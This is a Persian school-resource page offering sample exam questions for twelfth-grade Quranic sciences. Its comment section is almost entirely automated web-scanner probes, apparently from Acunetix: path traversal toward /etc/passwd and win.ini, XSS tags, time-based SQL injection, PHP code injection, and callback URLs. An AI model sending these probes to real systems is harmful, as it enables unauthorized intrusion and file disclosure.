دانلود نمونه سوالات امتحانی علوم و معارف قرآنی دوازدهم


دانلود نمونه سوالات امتحانی علوم و معارف قرآنی دوازدهم

تعداد بازدید:

53 بازدید

دانلود نمونه سوالات امتحانی علوم و معارف قرآنی دوازدهم

نظرات:

268 دیدگاه

دانلود نمونه سوالات امتحانی علوم و معارف قرآنی دوازدهم

انتشار:

02 دی 1398

ارسال شده توسط مدیر سایت

لینک کوتاه این مطلب:

https://darsbox.org/b/5467

دانلود نمونه سوالات امتحانی علوم و معارف قرآنی دوازدهم

دانلود نمونه سوالات امتحانی علوم و معارف قرآنی دوازدهم

با دوستانتان به اشتراک بگذارید
ارسال دیدگاه

لطفا همه فیلدها را پر کنید

CAPTCHA


نظرات ثبت شده

1 13 دی 1397

WEB-INF\web.xml


1 13 دی 1397

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\


1 13 دی 1397

WEB-INF/web.xml


1 13 دی 1397

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini


1 13 دی 1397

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini


1 13 دی 1397

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini


1 13 دی 1397

................windowswin.ini


1 13 دی 1397

..\..\..\..\..\..\..\..\windows\win.ini


1 13 دی 1397

1


1 13 دی 1397

../../../../../../../../../../windows/win.ini.jpg


1 13 دی 1397

1_9185


1 13 دی 1397

1


1 13 دی 1397

../../../../../../../../../../boot.ini


1 13 دی 1397

../../../../../../../../../../windows/win.ini


1 13 دی 1397

WEB-INF\web.xml


1 13 دی 1397

'"()&%<acx><ScRiPt >Qprk(9362)</ScRiPt>


1 13 دی 1397

/WEB-INF/web.xml


1 13 دی 1397

/\../\../\../\../\../\../\../etc/passwd


1 13 دی 1397

WEB-INF/web.xml


1 13 دی 1397

1'"()&%<acx><ScRiPt >Qprk(9148)</ScRiPt>


1 13 دی 1397

file:///etc/passwd


1 13 دی 1397

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.


1 13 دی 1397

1


1 13 دی 1397

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd


1 13 دی 1397

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd


1 13 دی 1397

/.././.././.././.././.././.././.././../etc/./passwd%00


1 13 دی 1397

%2fetc%2fpasswd


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

(select convert(int,CHAR(65)))


1 13 دی 1397

/etc/passwd


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

/../..//../..//../..//../..//../..//etc/passwd.jpg


1 13 دی 1397

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd


1 13 دی 1397

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg


1 13 دی 1397

../../../../../../../../../../etc/passwd.jpg


1 13 دی 1397

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg


1_9368 13 دی 1397

1


1 13 دی 1397

../../../../../../../../../../../../../../../proc/version


1 13 دی 1397

../../../../../../../../../../etc/passwd


1 13 دی 1397

JyI=


1 13 دی 1397

@@DKkn9


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

<!--


'"()&%<acx><ScRiPt >Qprk(9826)</ScRiPt> 13 دی 1397

1


1 13 دی 1397

\


1 13 دی 1397

'"


1 13 دی 1397

1'"


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1'"()&%<acx><ScRiPt >Qprk(9978)</ScRiPt> 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


<!-- 13 دی 1397

1


1 13 دی 1397

/www.vulnweb.com


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


'" 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


/www.vulnweb.com 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


(select convert(int,CHAR(65))) 13 دی 1397

1


1 13 دی 1397

1


JyI= 13 دی 1397

1


1 13 دی 1397

${@print(md5(acunetix_wvs_security_test))}\


@@x1uaO 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

${@print(md5(acunetix_wvs_security_test))}


1 13 دی 1397

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


1 13 دی 1397

";print(md5(acunetix_wvs_security_test));$a="


1 13 دی 1397

1


1 13 دی 1397

comment/.


1 13 دی 1397

';print(md5(acunetix_wvs_security_test));$a='


1 13 دی 1397

comment


1 13 دی 1397

;print(md5(acunetix_wvs_security_test));


1 13 دی 1397

comment


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 13 دی 1397

1


1 13 دی 1397

1


\ 13 دی 1397

1


1 13 دی 1397

http://hitlQVbDrCZXU.bxss.me/


1 13 دی 1397

1


1'" 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


comment/. 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


comment 13 دی 1397

1


1 13 دی 1397

1


http://hitG2FTVxFAH3.bxss.me/ 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

http://testasp.vulnweb.com/t/xss.html?%00.jpg


comment 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


${@print(md5(acunetix_wvs_security_test))}\ 13 دی 1397

1


1 13 دی 1397

1


http://testasp.vulnweb.com/t/xss.html?%00.jpg 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


";print(md5(acunetix_wvs_security_test));$a=" 13 دی 1397

1


1 13 دی 1397

1


${@print(md5(acunetix_wvs_security_test))} 13 دی 1397

1


';print(md5(acunetix_wvs_security_test));$a=' 13 دی 1397

1


1 13 دی 1397

1


;print(md5(acunetix_wvs_security_test)); 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

phBWTZl7');select pg_sleep(9); --


1 13 دی 1397

http://testasp.vulnweb.com/t/fit.txt?.jpg


1 13 دی 1397

1


1 13 دی 1397

yTLdfsE6'));select pg_sleep(9); --


1 13 دی 1397

testasp.vulnweb.com


WEB-INF\web.xml 13 دی 1397

1


1 13 دی 1397

^(#[email protected]#$)(()))******


1 13 دی 1397

Http://testasp.vulnweb.com/t/fit.txt


1 13 دی 1397

NIKmI4HO';select pg_sleep(9); --


1 13 دی 1397

'"()


1 13 دی 1397

1


1 13 دی 1397

-1);select pg_sleep(6); --


1 13 دی 1397

)


1 13 دی 1397

1


1 13 دی 1397

1some_inexistent_file_with_long_name.jpg


WEB-INF/web.xml 13 دی 1397

1


1 13 دی 1397

!(()&&!|*|*|


1 13 دی 1397

-1));select pg_sleep(9); --


1 13 دی 1397

-1;select pg_sleep(6); --


1 13 دی 1397

1


1 13 دی 1397

1&n987514=v953074


1 13 دی 1397

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg


unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ 13 دی 1397

1


1 13 دی 1397

p1HXjaY3'; waitfor delay '0:0:3' --


../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini 13 دی 1397

1


1 13 دی 1397

1


'"() 13 دی 1397

1


1 13 دی 1397

1


../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini 13 دی 1397

1


1 13 دی 1397

1 waitfor delay '0:0:3' --


/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

-1); waitfor delay '0:0:3' --


1 13 دی 1397

1


..\..\..\..\..\..\..\..\windows\win.ini 13 دی 1397

1


^(#[email protected]#$)(()))****** 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

-1; waitfor delay '0:0:9' --


................windowswin.ini 13 دی 1397

1


1 13 دی 1397

1


!(()&&!|*|*| 13 دی 1397

1


1 13 دی 1397

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/


) 13 دی 1397

1


../../../../../../../../../../windows/win.ini.jpg 13 دی 1397

1


1 13 دی 1397

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/


../../../../../../../../../../boot.ini 13 دی 1397

1


1 13 دی 1397

-1" OR 2+956-956-1=0+0+0+1 --


1 13 دی 1397

1


testasp.vulnweb.com 13 دی 1397

1


1 13 دی 1397

-1' OR 2+912-912-1=0+0+0+1 or '1HASXK9L'='


../../../../../../../../../../windows/win.ini 13 دی 1397

1


1 13 دی 1397

-1' OR 2+204-204-1=0+0+0+1 --


WEB-INF\web.xml 13 دی 1397

1


1&n906165=v988508 13 دی 1397

1


http://testasp.vulnweb.com/t/fit.txt?.jpg 13 دی 1397

1


1 13 دی 1397

${10000289+9999830}


/WEB-INF/web.xml 13 دی 1397

1


Http://testasp.vulnweb.com/t/fit.txt 13 دی 1397

1


1 13 دی 1397

-1 OR 2+806-806-1=0+0+0+1


WEB-INF/web.xml 13 دی 1397

1


1some_inexistent_file_with_long_name.jpg 13 دی 1397

1


1 13 دی 1397

-1 OR 2+215-215-1=0+0+0+1 --


1 13 دی 1397

K0uGZuxS


1 13 دی 1397

1


1 13 دی 1397

1


${9999875+9999209} 13 دی 1397

1


/\../\../\../\../\../\../\../etc/passwd 13 دی 1397

1


http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg 13 دی 1397

1


1 13 دی 1397

1


file:///etc/passwd 13 دی 1397

1


invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././